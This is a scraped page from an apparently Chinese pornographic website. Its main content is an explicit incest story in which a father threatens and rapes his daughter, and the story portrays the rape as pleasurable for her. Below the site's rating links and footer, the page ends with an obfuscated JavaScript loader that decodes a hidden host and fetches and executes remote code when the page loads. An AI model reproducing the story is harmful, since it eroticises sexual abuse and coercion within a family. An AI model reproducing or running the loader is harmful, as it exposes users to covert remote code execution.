返回

女儿的小穴(上)5b3

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



小缨是个普通的高中生,今年刚满十八。她还有一个妹妹琪琪,她们两个都遗传了母亲的甜美容貌,而身材则是年纪虽小,就已经分别拥有E罩杯和D罩杯了。她们的母亲已经去世三年多了,平常爸爸去上班工作时,就只有姊妹俩相互陪伴。今天妹妹去补习还没回家.已经放学的小缨閑得发慌,便先去洗澡.想说待会在爸爸下班之前先将晚饭做好。
洗完一个香喷喷的热水澡后,因为家裏只有她一个人,小缨便只套了件大ㄒ恤,既没穿胸罩,也没穿内裤,就开始準备晚餐了。就在她忙的不亦乐乎时,她突然听见客厅有人进来的声音.她忘了自己现在身上穿的是什么样子,就跑到客厅想一探究竟。原来是小缨的父亲国炜回来了,小缨开心的跑向父亲,并好奇地问道:“爸!你今天怎么这么早就回来了?都还不到下班时间呢!”
原来国炜今天和上司因为理念不合而起了冲突;上司命他先下班回家休息,并好好想想.希望他能配合公司的政策,否则……国炜越想越心烦,但当他抬眼看到女儿的清凉打扮时,他的脑中一片空白,完全忘了刚才的不愉快。此时小缨却浑然不知她那ECUP的一对巨乳将ㄒ恤撑得有多高耸,而那两颗站立的乳头更是像要撑破那薄薄的衣服一般、明显可见的挺立在衣服下。ㄒ恤下摆虽然恰恰遮到雪白柔腻的大腿根部,却仍不经意的露出了少许的少女阴毛。国炜仿佛可以闻到女儿身上所散发出来的诱人处女香…
此刻国炜禁欲三年的男性欲望早已被自己女儿的火辣身材所唤醒,下身的男性巨根正怒吼着想要发洩。国炜像着了魔一般,两眼发直的盯着小缨看,眼中所散发出的兽欲早已取代了平时疼爱女儿的他。小缨莫名的有些害怕,却又说不上来爸爸哪里不对劲。这时国炜突然问小缨:“小缨,你是不是最爱爸爸,最听爸爸的话呢?”小缨乖顺的点点头,国炜接着竟说:“那你现在把衣服脱下来好不好啊?”
小缨听了又惊讶、又害羞地猛摇头!国炜一看她不肯,马上大声怒喝:“你不脱的话就是不孝女!快给我脱!”
鲜少发怒的国炜把小缨吓坏了,连忙照做,将身上仅供蔽体的唯一一件上衣给脱了。这么一来,小缨便一丝不挂的站在父亲面前,国炜着迷的看着小缨丰满迷人的娇嫩女体…尤其是那一对雪白而高挺的奶子,最前端的粉红色娇豔乳头,仿佛正等着男人的吸吮。年轻少女未曾被男人玩弄过的处女胴体,有着白腻无瑕的弹性肌肤,正闪耀着透亮的光泽。而阴部由于被稀疏的阴毛所覆盖住无法得见,却更加激起国炜一探究竟的欲念。
国炜接着命令小缨坐到沙发上并将大腿张开。小缨虽然不敢不从,却也羞于在父亲面前双腿大开,而只是微微的张开膝盖一点点,便做不下去了。国炜猴急的解开皮带,脱掉裤子。掏出已经三年没有搞过女人的巨大肉棒,準备在女儿身上好好爽一爽。“过来!过来舔爸爸的肉棒!”
国炜扶着自己的男根步步逼近小缨,并硬将阴茎塞进小缨嘴裏。国炜的巨根塞进小缨嘴裏后,感到阵阵温热濡湿,数年未曾享受此等服务的他用力的扯住小缨的头髮前后晃动,使她能够持续吞吐自己的阳具。女儿的小嘴服侍得自己舒爽极了,他忍不住开始呻吟出声。由于小缨一直只是被动地承受国炜在她嘴裏的肆虐,并没有去舔弄父亲的肉棒。于是国炜粗鲁地用力拍打女儿的巨大乳房并喝道:“给我好好的舔!把它弄得舒服的话,待会爸爸会用它塞进你的小浪穴,也让你爽上天!”
小缨听到父亲竟对她说出这些淫秽的言词,虽然她尚未经人事,却也并非对性一无所知,不禁羞红了脸。她惶恐地试着搅动舌头去舔弄满涨在口中的男性,丁香小舌就这样轻轻地扫过国炜的龟头,霎时间国炜全身一震!一股许久未曾感受到的快感自背脊窜向后脑,使他低吼出声,差点就此爆浆!他怕再这样下去他很快就会破功;虽然他认为将精液射入女儿的檀香小口中、再逼其吞食也是一幅很诱人的画面,但他此刻只想保留精力,好让他能尽情开发可爱女儿的香甜处女嫩穴。
于是国炜转而袭向小缨那两只足以使所有男人为之疯狂的丰润高挺巨乳,他紧盯着那对大奶子,魔爪不停的使劲揉捏它们,欣赏那两团白肉在自己手中弹跳的样子。他更将嘴巴也凑上去,用力地吸吮那粉嫩娇豔如清透红莓的乳尖。从未被男人如此挑弄的小缨,看到自己的双乳被父亲如此狎玩,加上乳尖传来的阵阵骚动;敏感的小缨竟不自觉的发出了娇吟声。国炜发现清纯可人的女儿竟也有了反应!他更兴奋了,决定加快速度,好发洩自己的兽欲,也满足可爱的女儿小缨。
接着国炜便粗暴地扒开女儿的白滑双腿,当他看见小缨未曾遭受男人蹂躏的漂亮阴部时,他简直红了眼,恨不得立时将自己正肿胀不已、疼痛难当的巨大肉棒干进女儿的如花小嫩穴裏!国炜扑向小缨,将头埋在小缨的大腿根部,对着那散发着处女亮泽的两片小肉瓣伸出了滑舌,开始像发了狂般地吸吮舔弄。
而纯洁的小缨又怎么承受得了如此的进犯,她尖叫出声,雪白的身子向后仰躺,不断地颤抖。令得坚挺的乳房也跟着向上甩动,晃蕩出阵阵令人眩目的乳波。国炜的舌头灵活地舔洗过小缨阴部的每一寸,他着迷地尽情品尝着女儿散发阵阵幽香的美豔阴部,耳中听到女儿不停的淫声浪叫,使他更加情欲勃发。他吸住小缨最敏感的那颗小豆,口齿含糊不清的问小缨:“怎么样?爽不爽?爸爸舔的你爽不爽?说!给我说!”小缨经过这一连串的挑弄,对她来说实在是过于刺激了。她脑中早已一片空白,听到父亲这样问;她竟神智不清地回答:“嗯啊…爽…爸爸你弄得我好爽喔…啊…啊……”
这时国炜惊喜地发现,小缨的阴部正汩汩地泌出爱液;甚至流经股缝,漫流到了沙发的椅垫上头,使得小缨的腿间一片湿濡。“哼!想不到我的女儿原来是个等不及要被男人操的小骚货!都还没被男人玩过,就湿的这么快了吗?哈哈…等爸爸把下麵这一根干进你的小穴后,说不定以后你的小穴一痒,就会来求爸爸用大肉棒搞一搞你的小浪穴喔!哈哈哈……”
国炜边淫笑,边把自己早已难耐得流出透明液体的勃发阳具抵住女儿湿淋淋的蜜穴口,他已等不及插入了。小缨感觉到爸爸的大肉棒正抵着自己的穴口,并缓缓地摩擦着。这带给小缨另一种快感,她觉得自己全身麻痒,而且有一股莫名的空虚感及渴望;她渴望能有某种东西来填满她空虚的身子。
国炜看见女儿迷离涣散的眼神,知道女儿也性兴奋了。他将臀部向后移了一点,对準小缨的穴口,再将臀部往前用力一挺!便一口气猛力的捅破了小缨的处女膜,大肉棒直直的插到小缨的阴道最深处。国炜感觉到自己的男根被女儿温热的阴道嫩肉紧紧的吸住,简直是人间极乐!忍不住便甩动起腰部,开始在小缨的紧致小穴裏疯狂抽插了起来!
终于被自己父亲姦淫得逞的小缨,由于无法承受如此巨大的男性阳具,而忍不住在父亲的狂抽猛送下哀嚎出声,痛得哭了出来。
“呀啊啊!好痛…好痛喔!爸爸…求求你不要这样…我的阴道会被爸爸弄坏的……”
但是国炜早已丧失理智,此时他只想尽情的发洩压抑了三年的强大性欲。
他紧紧压住小缨,感受着女儿的弹性巨乳在他胸膛下的波蕩。他爽得说不出话来,只能含糊的发出呻吟声,并竭尽全力的将肉棒狠狠干进女儿的热穴裏、再用力抽出!享受这一进一出之间所产生的快感。
“不要…不要啊…救命……”小缨被爸爸的大肉棒干得痛不欲生,但当国炜抽插了一百多下后,小缨渐渐的在疼痛感之外感受到一种奇妙的快感;每当爸爸将肉棍插入自己小穴、再拔出去的时候,都会有种酥酥的、麻痒的感觉从阴道肌肉扩散开来,传至全身。而且这股麻痒的快感仿佛也传至她的乳头,使得她的乳头更加的硬挺高耸。“啊啊…我…嗯啊…我是怎么了……?啊……好奇怪喔…已经不痛了……嗯嗯!啊……”小缨觉得自己的体内多了这么一根肉棍在进进出出;好像全身的痒处都被搔到了,尤其是爸爸的阴茎顶到自己最深处时,更是舒爽难当,恨不得被多顶几下,好纾解自己的饑渴。随着小缨的处女穴被自己父亲的男根完全开通了之后,她淫浪的天性似乎因为被爸爸姦淫这件事,而整个激发出来了。小缨开始肆无忌惮的娇声浪吟;甚至扭动起自己白皙圆润的屁股,去迎合父亲在她体内的粗暴抽插。
“啊阿!爸爸…再裏面一点…啊呀呀!顶到…顶到了啊!好…好好…嗯嗯…啊!再来…再来啊…爸爸…”
国炜听到女儿已经被自己的大肉棍搞得抛弃羞耻,开始尽情享受身为一个女人与男人性交时的快感了,非常得意,他想,今后多了一个可以泄欲的工具,不仅随时随地都可以搞,还随传随到呢!他一边奋力地干穴边说道:“哼!知道爽了吗?小贱人!不好好的干一干你,恐怕你还不知道爸爸的厉害吧!给我叫大声一点!叫的好听的话,爸爸会多干你几下!快叫啊!”
于是小缨便高声浪叫了起来,简直就像个淫贱的妓女般;恨不得自己的穴被搞烂似的,边扭腰摆臀边哀叫:“啊啊…好爸爸…快干我…用力点干…我的洞好痒啊…快用你的大鸡巴搞我的小洞吧!求你…求你多干我几下啊…啊啊啊!”
小缨这时突然杏眼圆睁,小嘴再也无法出声,因为国炜紧紧抵住了小缨的子宫口,狠命的搅动了起来!至此小缨完全的疯狂了;她白眼外翻、全身激烈地抽慉;嘴角更是无法克制地流出了唾液,尖叫着达到了欲仙欲死的高潮!“呀啊啊啊啊………”
随着尖叫声的停歇,小缨的身子也精疲力尽的软了下来,疲软无力的任父亲继续蹂躏她的年轻肉体。国炜看见小缨在他身下瘫软无力的样子,更加满足了他的征服欲。他决定换个姿势继续搞他女儿,他突然将自己的男根从小缨的阴道中抽了出来;引起小缨的一阵呻吟:“嗯啊…”
接着国炜大声喝令小缨:“起来!给我趴在床上,把屁股翘高让你的浪穴露出来!”小缨照着父亲的指令乖乖地趴好之后问道:“爸爸…趴这样好奇怪喔!你为什么要叫我…呀啊……”不等小缨问完,国炜便扶着阳具,捧起小缨的玉臀,对準那初遭开苞、红肿充血且淫水漫流的洞口,一个用力;巨根便直挺挺的插进了那销魂穴。成熟的男人阴茎再度把初次性交的小缨捅得哀哀求饶:“啊啊…爸爸…别又来了…我已经没力了…啊…啊…不要再插进来了…呀啊啊!嗯嗯…”
小缨被这如野兽般的强烈攻势搞得几乎要虚脱了,几度要瘫平在床上,却又被父亲硬拉起纤腰继续搞她的嫩穴。改从后面干起女儿的国炜,双手伸至女儿身前、一手一个,抓住了那对大奶子。他看见女儿纤细的身子在自己的姦淫下婉转娇啼,嘤嘤求饶;雪白纤长的背脊不停颤抖着,细腰不自觉的轻摇扭摆;连带着白玉般的俏臀也跟着淫蕩的摇晃,形成了一幅淫靡无比的画面。他忽觉一阵强烈的射精感袭上背脊,他加快在女儿穴裏的抽插速度,阴囊不断的与小缨的臀部相撞,发出了阵阵肉体相互拍击的啪啪声响。国炜低吼:
“啊…我要射了…爸爸要把它们全都射给你了……乖女儿!把爸爸的精液接好了!”
此时国炜的快感已达顶点;他抖动着腰部,感到精液正喷射而出:“啊啊!我射了…射了啊啊啊……”
就这样,国炜将囤积了三年的浓精一口气全都射进了女儿体内!而小缨被这波又浓又烫的精液一射,强烈的刺激感令她的阴道忍不住收缩抽慉了起来!娇喊道:“啊呀呀……”
她未成熟的子宫也因为吸收了这些精液而蜕变了,至此小缨已在自己父亲的调教下成为了真正的女人了,而这些都还只是开始而已……


评分
相关推荐
3.0分

3.0分 女儿的小穴(上)-乱伦小说253

3.0分

3.0分 女儿的小穴(下)efc

3.0分

3.0分 [女儿的小穴]-乱伦小说2f5

3.0分

3.0分 女儿的穴小进不去c7c

3.0分

3.0分 女儿的小穴(下)-乱伦小说320

3.0分

3.0分 女儿同学妮可的小穴c97

3.0分

3.0分 精子射进女儿的小嫩穴59e

3.0分

3.0分 我的精子射进女儿的小嫩穴f22

3.0分

3.0分 女儿的骚穴f9e

3.0分

3.0分 爱上舅妈的小穴9cf

3.0分

3.0分 爱上舅妈的小穴9cf

3.0分

3.0分 爱上淫蕩舅妈的小穴a80

3.0分

3.0分 小心上了自己的乾女儿7c7

1.5分

1.5分 小穴屁眼儿都被操肿了b48

3.0分

3.0分 射满了女儿的春水穴90a

3.0分

3.0分 [我的精子射进女儿的小嫩穴](全文)作者:不详-乱伦小说59b


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};